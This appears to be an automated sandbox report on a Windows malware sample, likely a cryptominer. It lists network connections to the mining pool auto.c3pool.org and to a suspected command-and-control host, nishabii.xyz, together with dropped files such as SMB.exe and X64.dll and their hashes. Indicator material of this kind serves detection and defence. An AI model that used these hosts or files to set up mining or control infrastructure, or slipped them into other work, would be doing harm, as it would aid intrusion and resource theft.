US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 auto.c3pool.org udp
DE 195.201.97.156:19999 auto.c3pool.org tcp
US 8.8.8.8:53 auto.c3pool.org udp
DE 159.69.83.232:19999 auto.c3pool.org tcp
US 8.8.8.8:53 nishabii.xyz udp
CN 218.244.58.70:9011 nishabii.xyz tcp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp

Files

C:\ProgramData\syabcd.exe

MD5 23d84a7ed2e8e76d0a13197b74913654
SHA1 23d04ba674bafbad225243dc81ce7eccd744a35a
SHA256 ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301
SHA512 aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c

memory/1188-8-0x00007FF60A310000-0x00007FF60A954000-memory.dmp

memory/1188-10-0x0000017E078E0000-0x0000017E078F4000-memory.dmp

C:\ProgramData\SMB.exe

MD5 7b2f170698522cd844e0423252ad36c1
SHA1 303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5
SHA256 5214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994
SHA512 7155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa

memory/1188-125-0x00007FF60A310000-0x00007FF60A954000-memory.dmp

memory/1168-136-0x00007FF60A310000-0x00007FF60A954000-memory.dmp

C:\ProgramData\X86.dll

MD5 1714f5eea5939f5683d6a94fa9dee08f
SHA1 def4a7c8cfa0db9aafdc4f29872dc916777b57fb
SHA256 549c16048586a212e4f1d1b27411628a14b21defee427c1c48840024c8cbfd4f
SHA512 c1a9143584f8ca9397c2a49ea130ea3dee37d984a66df740cd8de97ef7c12800edb72f306d0a135aee616e5a657b73b2a0f35a334e54ef0be71c230fc01655d2

C:\ProgramData\X64.dll

MD5 c7fad963ad8e46e773dc5ee9177ab218
SHA1 92a68b223b2d2e501c1f0123fabf63e15fff4d11
SHA256 7417daf85e6215dedfd85ca8bfafcfd643c8afe0debcf983ad4bacdb4d1a6dbc
SHA512 efd3511ddf487e08515ff301fd8d521060f37ad8035e0c19fb5d9c730df444ced918596f54994d9d090c889a79ba3d431f96ae4fc942b0c4a8aa0c145a05419c

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

MD5 2cf24966a6aad7b6ecffe04a20eaf3dd
SHA1 e50a4184953faeec7e40bb33f52c08d7f22a2519
SHA256 01c9940b468ce2a58f2bc52f5c8b7d0310451c994d798879ff653d92fbaf8719
SHA512 5e4eda6d61438e46c5e93b994dcda0cddcb24a0f19529605715f74c91a9ad0cf30fd592aba8111d2aaae8c340f6b2860564f6b35e871df3f362afb48aea094f1
